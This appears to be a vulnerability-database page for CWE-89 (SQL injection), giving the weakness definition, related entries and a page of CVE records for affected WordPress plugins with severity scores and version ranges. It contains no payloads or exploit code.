CWE-89

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

BaseStableLikelihood: High

Description

The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.

Hierarchy (View 1000)

Parents

CWE-943

Children

CWE-564

Related attack patterns (CAPEC)

CAPEC-108 · CAPEC-109 · CAPEC-110 · CAPEC-470 · CAPEC-66 · CAPEC-7

CVEs mapped to this weakness (8,813)

page 66 of 441

CVE	Sev	Risk	CVSS	EPSS	Published	Description
CVE-2025-32681	Hig	0.55	8.5	0.00	Apr 11, 2025	Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WP Guru Error Log Viewer error-log-viewer-wp allows Blind SQL Injection.This issue affects Error Log Viewer: from n/a through <= 1.0.5.
CVE-2025-32650	Hig	0.55	8.5	0.00	Apr 11, 2025	Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Ability, Inc Accessibility Suite online-accessibility allows SQL Injection.This issue affects Accessibility Suite: from n/a through <= 4.18.
CVE-2025-32618	Hig	0.55	8.5	0.00	Apr 11, 2025	Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in PickPlugins Wishlist wishlist allows SQL Injection.This issue affects Wishlist: from n/a through <= 1.0.46.
CVE-2025-32567	Hig	0.55	8.5	0.00	Apr 11, 2025	Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in dev02ali Easy Post Duplicator easy-post-duplicator allows SQL Injection.This issue affects Easy Post Duplicator: from n/a through <= 1.0.1.
CVE-2025-32558	Hig	0.55	8.5	0.00	Apr 11, 2025	Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ketanajani Duplicate Title Checker duplicate-title-checker allows Blind SQL Injection.This issue affects Duplicate Title Checker: from n/a through <= 1.2.
CVE-2025-32687	Hig	0.55	8.5	0.00	Apr 10, 2025	Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Magnigenie Review Stars Count For WooCommerce review-stars-count-for-woocommerce allows SQL Injection.This issue affects Review Stars Count For WooCommerce: from n/a through <= 2.0.
CVE-2025-32149	Hig	0.55	8.5	0.00	Apr 4, 2025	Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in winkm89 teachPress teachpress allows SQL Injection.This issue affects teachPress: from n/a through <= 9.0.11.
CVE-2025-32148	Hig	0.55	8.5	0.00	Apr 4, 2025	Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Daisycon Daisycon prijsvergelijkers daisycon allows SQL Injection.This issue affects Daisycon prijsvergelijkers: from n/a through <= 4.8.4.
CVE-2025-31619	Hig	0.55	8.5	0.00	Apr 1, 2025	Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in marcoingraiti Actionwear products sync actionwear-products-sync allows SQL Injection.This issue affects Actionwear products sync: from n/a through <= 2.3.3.
CVE-2025-31564	Hig	0.55	8.5	0.00	Apr 1, 2025	Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in aitool Ai Auto Tool Content Writing Assistant (Gemini Writer, ChatGPT ) All in One ai-auto-tool allows Blind SQL Injection.This issue affects Ai Auto Tool Content Writing Assistant (Gemini Writer, ChatGPT ) All in One: from n/a through <= 2.2.6.
CVE-2025-31561	Hig	0.55	8.5	0.00	Apr 1, 2025	Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in CodeSolz Ultimate Push Notifications ultimate-push-notifications allows SQL Injection.This issue affects Ultimate Push Notifications: from n/a through <= 1.2.0.
CVE-2025-31089	Hig	0.55	8.5	0.00	Apr 1, 2025	Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Fahad Mahmood Order Splitter for WooCommerce woo-order-splitter allows SQL Injection.This issue affects Order Splitter for WooCommerce: from n/a through <= 5.3.0.
CVE-2025-31024	Hig	0.55	8.5	0.00	Apr 1, 2025	Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in randyjensen RJ Quickcharts rj-quickcharts allows SQL Injection.This issue affects RJ Quickcharts: from n/a through <= 0.6.1.
CVE-2025-30589	Hig	0.55	8.5	0.00	Apr 1, 2025	Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Dourou Flickr set slideshows flickr-set-slideshows allows SQL Injection.This issue affects Flickr set slideshows: from n/a through <= 0.9.
CVE-2025-31547	Hig	0.55	8.5	0.00	Mar 31, 2025	Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Aphotrax Uptime Robot Plugin for WordPress uptime-robot-monitor allows SQL Injection.This issue affects Uptime Robot Plugin for WordPress: from n/a through <= 2.3.
CVE-2025-31542	Hig	0.55	8.5	0.00	Mar 31, 2025	Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in wphocus My auctions allegro my-auctions-allegro-free-edition allows Blind SQL Injection.This issue affects My auctions allegro: from n/a through <= 3.6.20.
CVE-2025-31526	Hig	0.55	8.5	0.00	Mar 31, 2025	Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in eleopard Behance Portfolio Manager portfolio-manager-powered-by-behance allows SQL Injection.This issue affects Behance Portfolio Manager: from n/a through <= 1.7.5.
CVE-2025-31466	Hig	0.55	8.5	0.00	Mar 28, 2025	Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Falcon Solutions Duplicate Page and Post duplicate-post-and-page allows Blind SQL Injection.This issue affects Duplicate Page and Post: from n/a through <= 1.0.
CVE-2025-22783	Hig	0.55	8.5	0.01	Mar 27, 2025	Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in SEO Squirrly SEO Plugin by Squirrly SEO squirrly-seo allows SQL Injection.This issue affects SEO Plugin by Squirrly SEO: from n/a through <= 12.4.03.
CVE-2025-30819	Hig	0.55	8.5	0.00	Mar 27, 2025	Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Igor Benic Simple Giveaways giveasap allows SQL Injection.This issue affects Simple Giveaways: from n/a through <= 2.48.1.

CVE-2025-32681HigApr 11, 2025
risk 0.55cvss 8.5epss 0.00
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WP Guru Error Log Viewer error-log-viewer-wp allows Blind SQL Injection.This issue affects Error Log Viewer: from n/a through <= 1.0.5.
CVE-2025-32650HigApr 11, 2025
risk 0.55cvss 8.5epss 0.00
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Ability, Inc Accessibility Suite online-accessibility allows SQL Injection.This issue affects Accessibility Suite: from n/a through <= 4.18.
CVE-2025-32618HigApr 11, 2025
risk 0.55cvss 8.5epss 0.00
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in PickPlugins Wishlist wishlist allows SQL Injection.This issue affects Wishlist: from n/a through <= 1.0.46.
CVE-2025-32567HigApr 11, 2025
risk 0.55cvss 8.5epss 0.00
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in dev02ali Easy Post Duplicator easy-post-duplicator allows SQL Injection.This issue affects Easy Post Duplicator: from n/a through <= 1.0.1.
CVE-2025-32558HigApr 11, 2025
risk 0.55cvss 8.5epss 0.00
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ketanajani Duplicate Title Checker duplicate-title-checker allows Blind SQL Injection.This issue affects Duplicate Title Checker: from n/a through <= 1.2.
CVE-2025-32687HigApr 10, 2025
risk 0.55cvss 8.5epss 0.00
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Magnigenie Review Stars Count For WooCommerce review-stars-count-for-woocommerce allows SQL Injection.This issue affects Review Stars Count For WooCommerce: from n/a through <= 2.0.
CVE-2025-32149HigApr 4, 2025
risk 0.55cvss 8.5epss 0.00
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in winkm89 teachPress teachpress allows SQL Injection.This issue affects teachPress: from n/a through <= 9.0.11.
CVE-2025-32148HigApr 4, 2025
risk 0.55cvss 8.5epss 0.00
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Daisycon Daisycon prijsvergelijkers daisycon allows SQL Injection.This issue affects Daisycon prijsvergelijkers: from n/a through <= 4.8.4.
CVE-2025-31619HigApr 1, 2025
risk 0.55cvss 8.5epss 0.00
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in marcoingraiti Actionwear products sync actionwear-products-sync allows SQL Injection.This issue affects Actionwear products sync: from n/a through <= 2.3.3.
CVE-2025-31564HigApr 1, 2025
risk 0.55cvss 8.5epss 0.00
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in aitool Ai Auto Tool Content Writing Assistant (Gemini Writer, ChatGPT ) All in One ai-auto-tool allows Blind SQL Injection.This issue affects Ai Auto Tool Content Writing Assistant (Gemini Writer, ChatGPT ) All in One: from n/a through <= 2.2.6.
CVE-2025-31561HigApr 1, 2025
risk 0.55cvss 8.5epss 0.00
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in CodeSolz Ultimate Push Notifications ultimate-push-notifications allows SQL Injection.This issue affects Ultimate Push Notifications: from n/a through <= 1.2.0.
CVE-2025-31089HigApr 1, 2025
risk 0.55cvss 8.5epss 0.00
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Fahad Mahmood Order Splitter for WooCommerce woo-order-splitter allows SQL Injection.This issue affects Order Splitter for WooCommerce: from n/a through <= 5.3.0.
CVE-2025-31024HigApr 1, 2025
risk 0.55cvss 8.5epss 0.00
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in randyjensen RJ Quickcharts rj-quickcharts allows SQL Injection.This issue affects RJ Quickcharts: from n/a through <= 0.6.1.
CVE-2025-30589HigApr 1, 2025
risk 0.55cvss 8.5epss 0.00
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Dourou Flickr set slideshows flickr-set-slideshows allows SQL Injection.This issue affects Flickr set slideshows: from n/a through <= 0.9.
CVE-2025-31547HigMar 31, 2025
risk 0.55cvss 8.5epss 0.00
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Aphotrax Uptime Robot Plugin for WordPress uptime-robot-monitor allows SQL Injection.This issue affects Uptime Robot Plugin for WordPress: from n/a through <= 2.3.
CVE-2025-31542HigMar 31, 2025
risk 0.55cvss 8.5epss 0.00
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in wphocus My auctions allegro my-auctions-allegro-free-edition allows Blind SQL Injection.This issue affects My auctions allegro: from n/a through <= 3.6.20.
CVE-2025-31526HigMar 31, 2025
risk 0.55cvss 8.5epss 0.00
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in eleopard Behance Portfolio Manager portfolio-manager-powered-by-behance allows SQL Injection.This issue affects Behance Portfolio Manager: from n/a through <= 1.7.5.
CVE-2025-31466HigMar 28, 2025
risk 0.55cvss 8.5epss 0.00
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Falcon Solutions Duplicate Page and Post duplicate-post-and-page allows Blind SQL Injection.This issue affects Duplicate Page and Post: from n/a through <= 1.0.
CVE-2025-22783HigMar 27, 2025
risk 0.55cvss 8.5epss 0.01
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in SEO Squirrly SEO Plugin by Squirrly SEO squirrly-seo allows SQL Injection.This issue affects SEO Plugin by Squirrly SEO: from n/a through <= 12.4.03.
CVE-2025-30819HigMar 27, 2025
risk 0.55cvss 8.5epss 0.00
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Igor Benic Simple Giveaways giveasap allows SQL Injection.This issue affects Simple Giveaways: from n/a through <= 2.48.1.